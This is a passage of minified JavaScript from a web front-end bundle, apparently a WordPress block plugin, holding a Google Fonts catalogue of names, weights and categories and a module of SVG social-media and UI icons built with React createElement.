Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Puppies Play",v:[400],f:"handwriting"},{n:"Puritan",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Purple Purse",v:[400],f:"display"},{n:"Padyakke Expanded One",v:[400],f:"display"},{n:"Pathway Extreme",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Phudu",v:[300,400,500,600,700,800,900],f:"display"},{n:"Playfair",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Poltawski Nowy",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Qahiri",v:[400],f:"sans-serif"},{n:"Quando",v:[400],f:"serif"},{n:"Quantico",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Quattrocento",v:[400,700],f:"serif"},{n:"Quattrocento Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Questrial",v:[400],f:"sans-serif"},{n:"Quicksand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Quintessential",v:[400],f:"handwriting"},{n:"Qwigley",v:[400],f:"handwriting"},{n:"Qwitcher Grypen",v:[400,700],f:"handwriting"},{n:"Racing Sans One",v:[400],f:"display"},{n:"Radio Canada",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Radley",v:[400,"400i"],f:"serif"},{n:"Rajdhani",v:["300",400,500,600,700],f:"sans-serif"},{n:"Rakkas",v:[400],f:"display"},{n:"Raleway",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Raleway Dots",v:[400],f:"display"},{n:"Ramabhadra",v:[400],f:"sans-serif"},{n:"Ramaraja",v:[400],f:"serif"},{n:"Rambla",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Rammetto One",v:[400],f:"display"},{n:"Rampart One",v:[400],f:"display"},{n:"Ranchers",v:[400],f:"display"},{n:"Rancho",v:[400],f:"handwriting"},{n:"Ranga",v:[400,700],f:"display"},{n:"Rasa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Rationale",v:[400],f:"sans-serif"},{n:"Ravi Prakash",v:[400],f:"display"},{n:"Readex Pro",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Recursive",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"Red Hat Display",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Red Hat Mono",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Red Hat Text",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Red Rose",v:["300",400,500,600,700],f:"display"},{n:"Redacted",v:[400],f:"display"},{n:"Redacted Script",v:["300",400,700],f:"display"},{n:"Redressed",v:[400],f:"handwriting"},{n:"Reem Kufi",v:[400,500,600,700],f:"sans-serif"},{n:"Reenie Beanie",v:[400],f:"handwriting"},{n:"Reggae One",v:[400],f:"display"},{n:"Revalia",v:[400],f:"display"},{n:"Rhodium Libre",v:[400],f:"serif"},{n:"Ribeye",v:[400],f:"display"},{n:"Ribeye Marrow",v:[400],f:"display"},{n:"Righteous",v:[400],f:"display"},{n:"Risque",v:[400],f:"display"},{n:"Road Rage",v:[400],f:"display"},{n:"Roboto",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Roboto Condensed",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Roboto Flex",v:[400],f:"sans-serif"},{n:"Roboto Mono",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"monospace"},{n:"Roboto Serif",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Roboto Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Rochester",v:[400],f:"handwriting"},{n:"Rock Salt",v:[400],f:"handwriting"},{n:"RocknRoll One",v:[400],f:"sans-serif"},{n:"Rokkitt",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Romanesco",v:[400],f:"handwriting"},{n:"Ropa Sans",v:[400,"400i"],f:"sans-serif"},{n:"Rosario",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Rosarivo",v:[400,"400i"],f:"serif"},{n:"Rouge Script",v:[400],f:"handwriting"},{n:"Rowdies",v:["300",400,700],f:"display"},{n:"Rozha One",v:[400],f:"serif"},{n:"Rubik",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Rubik Beastly",v:[400],f:"display"},{n:"Rubik Bubbles",v:[400],f:"display"},{n:"Rubik Glitch",v:[400],f:"display"},{n:"Rubik Microbe",v:[400],f:"display"},{n:"Rubik Mono One",v:[400],f:"sans-serif"},{n:"Rubik Moonrocks",v:[400],f:"display"},{n:"Rubik Puddles",v:[400],f:"display"},{n:"Rubik Wet Paint",v:[400],f:"display"},{n:"Ruda",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Rufina",v:[400,700],f:"serif"},{n:"Ruge Boogie",v:[400],f:"handwriting"},{n:"Ruluko",v:[400],f:"sans-serif"},{n:"Rum Raisin",v:[400],f:"sans-serif"},{n:"Ruslan Display",v:[400],f:"display"},{n:"Russo One",v:[400],f:"sans-serif"},{n:"Ruthie",v:[400],f:"handwriting"},{n:"Rye",v:[400],f:"display"},{n:"Reem Kufi Fun",v:[400,500,600,700],f:"sans-serif"},{n:"Reem Kufi Ink",v:[400],f:"sans-serif"},{n:"Rubik 80s Fade",v:[400],f:"display"},{n:"Rubik Burned",v:[400],f:"display"},{n:"Rubik Dirt",v:[400],f:"display"},{n:"Rubik Distressed",v:[400],f:"display"},{n:"Rubik Gemstones",v:[400],f:"display"},{n:"Rubik Iso",v:[400],f:"display"},{n:"Rubik Marker Hatch",v:[400],f:"display"},{n:"Rubik Maze",v:[400],f:"display"},{n:"Rubik Pixels",v:[400],f:"display"},{n:"Rubik Spray Paint",v:[400],f:"display"},{n:"Rubik Storm",v:[400],f:"display"},{n:"Rubik Vinyl",v:[400],f:"display"},{n:"STIX Two Text",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Sacramento",v:[400],f:"handwriting"},{n:"Sahitya",v:[400,700],f:"serif"},{n:"Sail",v:[400],f:"display"},{n:"Saira",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Saira Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Extra Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Stencil One",v:[400],f:"display"},{n:"Salsa",v:[400],f:"display"},{n:"Sanchez",v:[400,"400i"],f:"serif"},{n:"Sancreek",v:[400],f:"display"},{n:"Sansita",v:[400,"400i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Sansita Swashed",v:["300",400,500,600,700,800,900],f:"display"},{n:"Sarabun",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Sarala",v:[400,700],f:"sans-serif"},{n:"Sarina",v:[400],f:"display"},{n:"Sarpanch",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Sassy Frass",v:[400],f:"handwriting"},{n:"Satisfy",v:[400],f:"handwriting"},{n:"Sawarabi Gothic",v:[400],f:"sans-serif"},{n:"Sawarabi Mincho",v:[400],f:"serif"},{n:"Scada",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Scheherazade New",v:[400,500,600,700],f:"serif"},{n:"Schoolbell",v:[400],f:"handwriting"},{n:"Scope One",v:[400],f:"serif"},{n:"Seaweed Script",v:[400],f:"display"},{n:"Secular One",v:[400],f:"sans-serif"},{n:"Sedgwick Ave",v:[400],f:"handwriting"},{n:"Sedgwick Ave Display",v:[400],f:"handwriting"},{n:"Sen",v:[400,700,800],f:"sans-serif"},{n:"Send Flowers",v:[400],f:"handwriting"},{n:"Sevillana",v:[400],f:"display"},{n:"Seymour One",v:[400],f:"sans-serif"},{n:"Shadows Into Light",v:[400],f:"handwriting"},{n:"Shadows Into Light Two",v:[400],f:"handwriting"},{n:"Shalimar",v:[400],f:"handwriting"},{n:"Shanti",v:[400],f:"sans-serif"},{n:"Share",v:[400,"400i",700,"700i"],f:"display"},{n:"Share Tech",v:[400],f:"sans-serif"},{n:"Share Tech Mono",v:[400],f:"monospace"},{n:"Shippori Antique",v:[400],f:"sans-serif"},{n:"Shippori Antique B1",v:[400],f:"sans-serif"},{n:"Shippori Mincho",v:[400,500,600,700,800],f:"serif"},{n:"Shippori Mincho B1",v:[400,500,600,700,800],f:"serif"},{n:"Shojumaru",v:[400],f:"display"},{n:"Short Stack",v:[400],f:"handwriting"},{n:"Shrikhand",v:[400],f:"display"},{n:"Siemreap",v:[400],f:"display"},{n:"Sigmar One",v:[400],f:"display"},{n:"Signika",v:["300",400,500,600,700],f:"sans-serif"},{n:"Signika Negative",v:["300",400,500,600,700],f:"sans-serif"},{n:"Simonetta",v:[400,"400i",900,"900i"],f:"display"},{n:"Single Day",v:[400],f:"display"},{n:"Sintony",v:[400,700],f:"sans-serif"},{n:"Sirin Stencil",v:[400],f:"display"},{n:"Six Caps",v:[400],f:"sans-serif"},{n:"Skranji",v:[400,700],f:"display"},{n:"Slabo 13px",v:[400],f:"serif"},{n:"Slabo 27px",v:[400],f:"serif"},{n:"Slackey",v:[400],f:"display"},{n:"Smokum",v:[400],f:"display"},{n:"Smooch",v:[400],f:"handwriting"},{n:"Smooch Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Smythe",v:[400],f:"display"},{n:"Sniglet",v:[400,800],f:"display"},{n:"Snippet",v:[400],f:"sans-serif"},{n:"Snowburst One",v:[400],f:"display"},{n:"Sofadi One",v:[400],f:"display"},{n:"Sofia",v:[400],f:"handwriting"},{n:"Solway",v:["300",400,500,700,800],f:"serif"},{n:"Song Myung",v:[400],f:"serif"},{n:"Sonsie One",v:[400],f:"display"},{n:"Sora",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Sorts Mill Goudy",v:[400,"400i"],f:"serif"},{n:"Source Code Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Source Sans 3",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Source Sans Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Source Serif 4",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Source Serif Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"serif"},{n:"Space Grotesk",v:["300",400,500,600,700],f:"sans-serif"},{n:"Space Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Special Elite",v:[400],f:"display"},{n:"Spectral",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spectral SC",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spicy Rice",v:[400],f:"display"},{n:"Spinnaker",v:[400],f:"sans-serif"},{n:"Spirax",v:[400],f:"display"},{n:"Spline Sans",v:["300",400,500,600,700],f:"sans-serif"},{n:"Squada One",v:[400],f:"display"},{n:"Square Peg",v:[400],f:"handwriting"},{n:"Sree Krushnadevaraya",v:[400],f:"serif"},{n:"Sriracha",v:[400],f:"handwriting"},{n:"Srisakdi",v:[400,700],f:"display"},{n:"Staatliches",v:[400],f:"display"},{n:"Stalemate",v:[400],f:"handwriting"},{n:"Stalinist One",v:[400],f:"display"},{n:"Stardos Stencil",v:[400,700],f:"display"},{n:"Stick",v:[400],f:"sans-serif"},{n:"Stick No Bills",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Stint Ultra Condensed",v:[400],f:"display"},{n:"Stint Ultra Expanded",v:[400],f:"display"},{n:"Stoke",v:["300",400],f:"serif"},{n:"Strait",v:[400],f:"sans-serif"},{n:"Style Script",v:[400],f:"handwriting"},{n:"Stylish",v:[400],f:"sans-serif"},{n:"Sue Ellen Francisco",v:[400],f:"handwriting"},{n:"Suez One",v:[400],f:"serif"},{n:"Sulphur Point",v:["300",400,700],f:"sans-serif"},{n:"Sumana",v:[400,700],f:"serif"},{n:"Sunflower",v:["300",500,700],f:"sans-serif"},{n:"Sunshiney",v:[400],f:"handwriting"},{n:"Supermercado One",v:[400],f:"display"},{n:"Sura",v:[400,700],f:"serif"},{n:"Suranna",v:[400],f:"serif"},{n:"Suravaram",v:[400],f:"serif"},{n:"Suwannaphum",v:["100","300",400,700,900],f:"serif"},{n:"Swanky and Moo Moo",v:[400],f:"handwriting"},{n:"Syncopate",v:[400,700],f:"sans-serif"},{n:"Syne",v:[400,500,600,700,800],f:"sans-serif"},{n:"Syne Mono",v:[400],f:"monospace"},{n:"Syne Tactile",v:[400],f:"display"},{n:"Schibsted Grotesk",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Shantell Sans",v:[300,400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"display"},{n:"Sigmar",v:[400],f:"display"},{n:"Silkscreen",v:[400,700],f:"display"},{n:"Slackside One",v:[400],f:"handwriting"},{n:"Sofia Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Extra Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Semi Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Solitreo",v:[400],f:"handwriting"},{n:"Sono",v:[200,300,400,500,600,700,800],f:"sans-serif"},{n:"Splash",v:[400],f:"handwriting"},{n:"Spline Sans Mono",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Tajawal",v:["200","300",400,500,700,800,900],f:"sans-serif"},{n:"Tangerine",v:[400,700],f:"handwriting"},{n:"Tapestry",v:[400],f:"handwriting"},{n:"Taprom",v:[400],f:"display"},{n:"Tauri",v:[400],f:"sans-serif"},{n:"Taviraj",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Teko",v:["300",400,500,600,700],f:"sans-serif"},{n:"Telex",v:[400],f:"sans-serif"},{n:"Tenali Ramakrishna",v:[400],f:"sans-serif"},{n:"Tenor Sans",v:[400],f:"sans-serif"},{n:"Text Me One",v:[400],f:"sans-serif"},{n:"Texturina",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Thasadith",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"The Girl Next Door",v:[400],f:"handwriting"},{n:"The Nautigal",v:[400,700],f:"handwriting"},{n:"Tienne",v:[400,700,900],f:"serif"},{n:"Tillana",v:[400,500,600,700,800],f:"handwriting"},{n:"Timmana",v:[400],f:"sans-serif"},{n:"Tinos",v:[400,"400i",700,"700i"],f:"serif"},{n:"Titan One",v:[400],f:"display"},{n:"Titillium Web",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900],f:"sans-serif"},{n:"Tomorrow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Tourney",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Trade Winds",v:[400],f:"display"},{n:"Train One",v:[400],f:"display"},{n:"Trirong",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Trispace",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Trocchi",v:[400],f:"serif"},{n:"Trochut",v:[400,"400i",700],f:"display"},{n:"Truculenta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Trykker",v:[400],f:"serif"},{n:"Tulpen One",v:[400],f:"display"},{n:"Turret Road",v:["200","300",400,500,700,800],f:"display"},{n:"Twinkle Star",v:[400],f:"handwriting"},{n:"Tai Heritage Pro",v:[400,700],f:"serif"},{n:"Tilt Neon",v:[400],f:"display"},{n:"Tilt Prism",v:[400],f:"display"},{n:"Tilt Warp",v:[400],f:"display"},{n:"Tiro Bangla",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Hindi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Marathi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Sanskrit",v:[400,"400i"],f:"serif"},{n:"Tiro Gurmukhi",v:[400,"400i"],f:"serif"},{n:"Tiro Kannada",v:[400,"400i"],f:"serif"},{n:"Tiro Tamil",v:[400,"400i"],f:"serif"},{n:"Tiro Telugu",v:[400,"400i"],f:"serif"},{n:"Tsukimi Rounded",v:[300,400,500,600,700],f:"sans-serif"},{n:"Ubuntu",v:["300","300i",400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Ubuntu Condensed",v:[400],f:"sans-serif"},{n:"Ubuntu Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Uchen",v:[400],f:"serif"},{n:"Ultra",v:[400],f:"serif"},{n:"Uncial Antiqua",v:[400],f:"display"},{n:"Underdog",v:[400],f:"display"},{n:"Unica One",v:[400],f:"display"},{n:"UnifrakturCook",v:[700],f:"display"},{n:"UnifrakturMaguntia",v:[400],f:"display"},{n:"Unkempt",v:[400,700],f:"display"},{n:"Unlock",v:[400],f:"display"},{n:"Unna",v:[400,"400i",700,"700i"],f:"serif"},{n:"Updock",v:[400],f:"handwriting"},{n:"Urbanist",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Unbounded",v:[200,300,400,500,600,700,800,900],f:"display"},{n:"VT323",v:[400],f:"monospace"},{n:"Vampiro One",v:[400],f:"display"},{n:"Varela",v:[400],f:"sans-serif"},{n:"Varela Round",v:[400],f:"sans-serif"},{n:"Varta",v:["300",400,500,600,700],f:"sans-serif"},{n:"Vast Shadow",v:[400],f:"display"},{n:"Vazirmatn",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Vesper Libre",v:[400,500,700,900],f:"serif"},{n:"Viaoda Libre",v:[400],f:"display"},{n:"Vibes",v:[400],f:"display"},{n:"Vibur",v:[400],f:"handwriting"},{n:"Vidaloka",v:[400],f:"serif"},{n:"Viga",v:[400],f:"sans-serif"},{n:"Voces",v:[400],f:"display"},{n:"Volkhov",v:[400,"400i",700,"700i"],f:"serif"},{n:"Vollkorn",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Vollkorn SC",v:[400,600,700,900],f:"serif"},{n:"Voltaire",v:[400],f:"sans-serif"},{n:"Vujahday Script",v:[400],f:"handwriting"},{n:"Vina Sans",v:[400],f:"display"},{n:"Waiting for the Sunrise",v:[400],f:"handwriting"},{n:"Wallpoet",v:[400],f:"display"},{n:"Walter Turncoat",v:[400],f:"handwriting"},{n:"Warnes",v:[400],f:"display"},{n:"Water Brush",v:[400],f:"handwriting"},{n:"Waterfall",v:[400],f:"handwriting"},{n:"Wellfleet",v:[400],f:"display"},{n:"Wendy One",v:[400],f:"sans-serif"},{n:"Whisper",v:[400],f:"handwriting"},{n:"WindSong",v:[400,500],f:"handwriting"},{n:"Wire One",v:[400],f:"sans-serif"},{n:"Work Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Wix Madefor Display",v:[400,500,600,700,800],f:"sans-serif"},{n:"Wix Madefor Text",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Xanh Mono",v:[400,"400i"],f:"monospace"},{n:"Yaldevi",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yanone Kaffeesatz",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yantramanav",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Yatra One",v:[400],f:"display"},{n:"Yellowtail",v:[400],f:"handwriting"},{n:"Yeon Sung",v:[400],f:"display"},{n:"Yeseva One",v:[400],f:"display"},{n:"Yesteryear",v:[400],f:"handwriting"},{n:"Yomogi",v:[400],f:"handwriting"},{n:"Yrsa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Yuji Boku",v:[400],f:"serif"},{n:"Yuji Mai",v:[400],f:"serif"},{n:"Yuji Syuku",v:[400],f:"serif"},{n:"Yusei Magic",v:[400],f:"sans-serif"},{n:"Ysabeau",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"ZCOOL KuaiLe",v:[400],f:"sans-serif"},{n:"ZCOOL QingKe HuangYou",v:[400],f:"sans-serif"},{n:"ZCOOL XiaoWei",v:[400],f:"sans-serif"},{n:"Zen Antique",v:[400],f:"serif"},{n:"Zen Antique Soft",v:[400],f:"serif"},{n:"Zen Dots",v:[400],f:"display"},{n:"Zen Kaku Gothic Antique",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kaku Gothic New",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kurenaido",v:[400],f:"sans-serif"},{n:"Zen Loop",v:[400,"400i"],f:"display"},{n:"Zen Maru Gothic",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Old Mincho",v:[400,500,600,700,900],f:"serif"},{n:"Zen Tokyo Zoo",v:[400],f:"display"},{n:"Zeyada",v:[400],f:"handwriting"},{n:"Zhi Mang Xing",v:[400],f:"handwriting"},{n:"Zilla Slab",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Zilla Slab Highlight",v:[400,700],f:"display"}]},83245:(e,t,l)=>{"use strict";l.d(t,{T0:()=>a,ZP:()=>n});var o=l(67294);const a={subtract:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),plus:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),skype:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100 99.964"},(0,o.createElement)("path",{d:"M97.637 61.79a3.8 3.8 0 0 1-.265-2.338c2.854-16.467-1.618-30.679-13.443-42.449A46.289 46.289 0 0 0 57.307 3.971a45.987 45.987 0 0 0-13.429.031 3.88 3.88 0 0 1-2.678-.468 27.868 27.868 0 0 0-37.106 9.469 27.009 27.009 0 0 0-.722 27.349 2.2 2.2 0 0 1 .268 1.577c-4.109 21.989 7.627 42.639 27.735 51.084a48.685 48.685 0 0 0 26.784 3.2 3.168 3.168 0 0 1 2.058.3 28.253 28.253 0 0 0 14.99 3.392 24.78 24.78 0 0 0 10.7-3.344 28.036 28.036 0 0 0 13.784-19.714 26.476 26.476 0 0 0-2.054-15.057Zm-22.9 2.118c-1.145 6.065-5.1 9.919-10.639 12.005a34.579 34.579 0 0 1-25.014.047 17.5 17.5 0 0 1-10.124-9.767 10.7 10.7 0 0 1-.823-3.5 4.786 4.786 0 0 1 2.69-4.8 5.42 5.42 0 0 1 5.954.641 8.434 8.434 0 0 1 1.858 2.609c.575 1.166 1.117 2.344 1.763 3.477a10.145 10.145 0 0 0 8.116 5.239c3.849.439 7.6.181 11.051-1.866 3.034-1.8 4.327-4.8 3.344-7.958a6.789 6.789 0 0 0-3.821-3.96 36.8 36.8 0 0 0-8.484-2.527c-4.659-1.075-9.32-2.134-13.636-4.306-6.146-3.093-8.925-8.983-7.25-15.629a12.974 12.974 0 0 1 5.917-7.83 26.362 26.362 0 0 1 12.494-3.723c1.1-.089 2.212-.11 2.953-.145 5.344.04 10.179.739 14.54 3.347 3.038 1.816 5.483 4.183 6.521 7.712a5.465 5.465 0 0 1-1.221 5.8 5.212 5.212 0 0 1-8.142-.932c-.8-1.185-1.506-2.436-2.312-3.618a9.062 9.062 0 0 0-6.6-4.222c-3.583-.437-7.092-.415-10.344 1.435a5.654 5.654 0 0 0-3.072 3.721c-.446 2.16.408 3.849 2.36 5.136 2.449 1.616 5.253 2.209 8.032 2.887a123.979 123.979 0 0 1 12.525 3.358 19.776 19.776 0 0 1 8.3 4.956c3.252 3.573 3.917 7.862 3.06 12.414Z"})),link:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M10 17.389H8.444A5.194 5.194 0 1 1 8.444 7H10v1.5H8.444a3.694 3.694 0 0 0 0 7.389H10v1.5ZM14 7h1.556a5.194 5.194 0 0 1 0 10.39H14v-1.5h1.556a3.694 3.694 0 0 0 0-7.39H14V7Zm-4.5 6h5v-1.5h-5V13Z"})),facebook:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"M50 4.4v41.1c0 2.5-2 4.4-4.4 4.4H34.5V31.1c0-.4.1-.6.5-.5h5.4c.4 0 .6 0 .6-.5.3-2.3.6-4.6.9-7 0-.4-.1-.4-.4-.4h-6.6c-.3 0-.5-.1-.5-.4v-4.8c-.1-1.5 1-2.9 2.6-3H41.6c.3 0 .4-.1.4-.4V7.9c0-.4-.1-.4-.5-.4-1.5 0-6.7 0-7.8.2-4 .7-6.9 4-7.2 8.1-.1 2.2 0 4.4 0 6.6 0 .5-.1.6-.6.6h-5.5c-.3 0-.4.1-.4.4v7c0 .3.1.4.4.4h5.5c.5 0 .6.1.6.6v18.8H4.4C2 50 0 48 0 45.5V4.4C0 2 2 0 4.4 0h41.1C48 0 50 2 50 4.4z"})),twitter:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17.7512 3H20.818L14.1179 10.6246L22 21H15.8284L10.9946 14.7074L5.46359 21H2.39494L9.5613 12.8446L2 3H8.32828L12.6976 8.75169L17.7512 3ZM16.6748 19.1723H18.3742L7.4049 4.73169H5.58133L16.6748 19.1723Z"})),tiktok_lite_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 35.699 50"},(0,o.createElement)("path",{d:"M27.638 5.514A13.716 13.716 0 0 1 26.162 0h-6.835v28.914a6.244 6.244 0 1 1-6.241-6.247 6.086 6.086 0 0 1 1.965.32v-7.002a12.836 12.836 0 0 0-1.965-.149A13.082 13.082 0 1 0 26.16 28.918V14.134a17.847 17.847 0 0 0 10.454 3.277l.162-6.834c-4.405-.105-7.4-1.761-9.14-5.063"})),tiktok_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m11.606 21.714a11.347 11.347 0 0 1-6.656-2.086v9.413a8.323 8.323 0 1 1-7.076-8.236v4.461a3.9 3.9 0 0 0-1.251-.2 3.978 3.978 0 1 0 3.974 3.977V10.628h4.353a8.761 8.761 0 0 0 .94 3.514c1.112 2.1 3.015 3.156 5.821 3.223Z"})),instagram_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M30.889 22a8.883 8.883 0 0 1-8.976 8.888A8.932 8.932 0 1 1 30.889 22"}),(0,o.createElement)("path",{d:"M22 0C1.18 0 0 1.179 0 22s1.18 22 22 22 22-1.179 22-22S42.821 0 22 0m0 35.816A13.818 13.818 0 1 1 35.816 22 13.817 13.817 0 0 1 22 35.816m14.362-24.948a3.194 3.194 0 0 1-3.256-3.256 3.248 3.248 0 0 1 3.256-3.256 3.175 3.175 0 0 1 3.168 3.256 3.123 3.123 0 0 1-3.168 3.256"}))),linkedin:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("path",{d:"M37.53 0H4.47A4.468 4.468 0 0 0 0 4.47v33.06A4.468 4.468 0 0 0 4.47 42h33.06A4.468 4.468 0 0 0 42 37.53V4.47A4.468 4.468 0 0 0 37.53 0M12.49 35.12c0 